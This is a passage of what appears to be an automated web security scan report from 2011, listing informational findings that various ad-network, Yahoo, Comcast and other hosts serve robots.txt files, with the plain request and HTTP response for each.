User-agent: *
Disallow: /

22.4. http://ad.turn.com/server/ads.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 12:44:53 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

22.5. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:24:25 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:24:25 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

22.6. http://ads.bluelithium.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /iframe3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.bluelithium.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:29:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:29:49 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

22.7. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:1718"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:45:11 GMT
Connection: close

User-agent: *
Disallow: /

22.8. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1310681018000"
Last-Modified: Thu, 14 Jul 2011 22:03:38 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 12:48:07 GMT
Connection: close

User-agent: *
Disallow: /

22.9. http://altfarm.mediaplex.com/ad/js/3484-103250-2056-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3484-103250-2056-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1158796162000"
Last-Modified: Wed, 20 Sep 2006 23:49:22 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 12:55:54 GMT
Connection: keep-alive

User-agent: *
Disallow: /

22.10. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Thu, 06 Oct 2011 12:49:45 GMT
X-FB-Server: 10.28.5.127
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

22.11. http://api.recaptcha.net/challenge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.recaptcha.net
Path:   /challenge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.recaptcha.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:26:51 GMT
Expires: Tue, 06 Sep 2011 12:26:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

22.12. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Tue, 06 Sep 2011 12:45:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:45:57 GMT
Connection: close

User-agent: *
Disallow: /

22.13. http://as1.suitesmart.com/99917/G15493.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /99917/G15493.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as1.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT
ETag: "19e36-1a-49c6f3a952b40"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close
Cache-Control: no-store

User-agent: *
Disallow: /

22.14. http://autos.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: autos.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 03 Dec 2007 22:46:32 GMT
Accept-Ranges: bytes
Content-Length: 33
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Age: 0
Server: YTS/1.19.5

User-agent: Vast_Bot
Disallow: /

22.15. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 07 Sep 2011 12:45:57 GMT
Date: Tue, 06 Sep 2011 12:45:57 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

22.16. http://by.optimost.com/trial/471/p/customerhomepage.58a/57/content.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /trial/471/p/customerhomepage.58a/57/content.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3615671944"
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Content-Length: 26
Server: Fast
Expires: Tue, 06 Sep 2011 11:58:57 GMT
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:58:57 GMT
Connection: close

User-agent: *
Disallow: /

22.17. http://cdn.optmd.com/V2/80181/197812/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/80181/197812/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.optmd.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2005 22:51:33 GMT
ETag: "d54bba-1a-3fa51a4b8c740"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 12:45:57 GMT
Connection: close

User-agent: *
Disallow: /

22.18. http://cdn.turn.com/server/ddc.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Tue, 06 Sep 2011 12:44:56 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

22.19. http://citizenstelecom.112.2o7.net/b/ss/cznfrontier/1/H.22.1/s93230034164153  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citizenstelecom.112.2o7.net
Path:   /b/ss/cznfrontier/1/H.22.1/s93230034164153

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: citizenstelecom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:44 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "115248-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www15
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.20. http://comcast-www.baynote.net/baynote/tags3/common  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://comcast-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: comcast-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1315309802000"
Last-Modified: Tue, 06 Sep 2011 11:50:02 GMT
Content-Type: text/plain
Content-Length: 216
Date: Tue, 06 Sep 2011 12:22:13 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

22.21. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://comcastresidentialservices.tt.omtrdc.net
Path:   /m2/comcastresidentialservices/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: comcastresidentialservices.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:22:15 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

22.22. http://ec.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /ds/TRATR11234001/300x100/multipolicy_300x100.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Expires: Tue, 13 Sep 2011 12:48:17 GMT
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/plain
Content-Length: 68
Allow: GET
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

22.23. http://ehg-verizon.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ehg-verizon.hitbox.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:54 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Tue, 06 Sep 2011 12:50:54 GMT
Content-Type: text/plain
Content-Length: 36

User-agent: *
Disallow: /Diagnostic

22.24. http://espanol.vonage.com/mpel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://espanol.vonage.com
Path:   /mpel.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: espanol.vonage.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Wed, 03 Feb 2010 20:08:10 GMT
Accept-Ranges: bytes
ETag: "0f1779bca5ca1:3746"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:15 GMT
Connection: close

User-agent: *
Disallow: /img/
Disallow: /lib/
Disallow: /pages/

22.25. http://event.rtrk.com/event/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://event.rtrk.com
Path:   /event/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: event.rtrk.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:18 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 26
Keep-Alive: timeout=12, max=68
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:10 GMT;path=/;httponly

User-agent: *
Disallow: /

22.26. http://finance.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: finance.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 02 Dec 2010 23:04:54 GMT
Accept-Ranges: bytes
Content-Length: 85
Content-Type: text/plain; charset=utf-8
Age: 0
Server: YTS/1.20.7

User-agent: *
Disallow: /print/
Sitemap: http://finance.yahoo.com/seo_sm_finance_xml

22.27. http://fonts.googleapis.com/css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 11:51:55 GMT
Expires: Tue, 06 Sep 2011 11:51:55 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

22.28. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forums.comcast.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Last-Modified: Wed, 03 Aug 2011 09:11:43 GMT
ETag: "53288ef2-19f-4a99640c867f8"
Accept-Ranges: bytes
Content-Length: 415
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Default Generated robots.txt file
User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help
...[SNIP]...

22.29. http://frontier.com/winwin1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: frontier.com

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: text/plain
Last-Modified: Sun, 25 Apr 2010 04:41:04 GMT
Accept-Ranges: bytes
ETag: "4140a18331e4ca1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:40 GMT
Connection: close

User-agent: *
Disallow: /frontierusage/
Allow: /


22.30. http://g-pixel.invitemedia.com/gmatcher  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:24:25 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.31. http://games.frontier.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: games.frontier.com

Response

HTTP/1.0 200 OK
Content-Length: 409
Content-Type: txt
Last-Modified: Tue, 21 Jul 2009 12:04:36 GMT
Accept-Ranges: bytes
ETag: "022666afb9ca1:8f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:51 GMT
Connection: close

User-agent: Mediapartners-Google
Disallow:

User-agent: YahooYSMcm
Disallow:

User-agent: Googlebot
Disallow: /channels/wizard/
Disallow: /checkout/
Disallow: /membership/
Disallow: /profil
...[SNIP]...

22.32. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://global.ard.yahoo.com
Path:   /SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: global.ard.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:31 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /

22.33. https://go.ooma.com/activate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://go.ooma.com
Path:   /activate

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: go.ooma.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:27 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 19:24:49 GMT
ETag: "da3e-cc-2de98240"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

22.34. http://gws.maps.yahoo.com/MapImage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gws.maps.yahoo.com
Path:   /MapImage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gws.maps.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:53 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Yahoo-Serving-Host: gws30.maps.sp1.yahoo.com
Last-Modified: Sat, 05 Dec 2009 08:01:33 GMT
Accept-Ranges: bytes
Content-Length: 27
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-Agent: *
Disallow: /


22.35. http://iar.worthathousandwords.com/iar.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://iar.worthathousandwords.com
Path:   /iar.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: iar.worthathousandwords.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Mon, 30 Jan 2006 17:23:57 GMT
Accept-Ranges: bytes
ETag: "5876b6f3c125c61:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:41:17 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

22.36. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:55:56 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

22.37. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: int.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1310682020000"
Last-Modified: Thu, 14 Jul 2011 22:20:20 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 12:44:43 GMT
Connection: close

User-agent: *
Disallow: /

22.38. http://integrate.112.2o7.net/dfa_echo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://integrate.112.2o7.net
Path:   /dfa_echo

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "25545d-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www98
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.39. http://ips-invite.iperceptions.com/webValidator.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ips-invite.iperceptions.com
Path:   /webValidator.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ips-invite.iperceptions.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 27 Feb 2008 16:52:38 GMT
Accept-Ranges: bytes
ETag: "b1c52f296179c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE02
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 12:46:23 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

22.40. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: landing.optionshouse.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:15 GMT
Connection: close
Content-Length: 82

Sitemap: http://landing.optionshouse.com/sitemap.xml

User-agent: *
Allow: /

22.41. https://login.aptela.com/cgi/login.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.aptela.com
Path:   /cgi/login.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.aptela.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Sun, 01 Nov 2009 21:31:08 GMT
ETag: "30000799-1a-47755faa6bf00"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.42. https://login.comcast.net/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.comcast.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:41 GMT
Server: Apache
Last-Modified: Tue, 30 Aug 2011 14:39:35 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=492
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.43. http://metrics.scottrade.com/b/ss/scottradecom,scottradeglobal/1/H.22.1/s98473441649693  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.scottrade.com
Path:   /b/ss/scottradecom,scottradeglobal/1/H.22.1/s98473441649693

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.scottrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:47 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "299153-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www39
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.44. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s95377543827053  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /b/ss/vonagevonagecomsubscribeprod/1/H.21/s95377543827053

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "386f56-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www15
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.45. http://movies.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: movies.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:07:20 GMT
Content-Length: 70
Accept-Ranges: bytes
Last-Modified: Thu, 14 Jul 2011 09:21:47 GMT
Etag: "YM:1:2ce9a88e-0e0a-496b-83b2-3ae576312874"
Cache-Control: max-age=180, public
Expires:
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 2258
Via: HTTP/1.1 web16.usw7.mobstor.s2e.yahoo.com (YahooTrafficServer/1.19.8 [c sNf ])
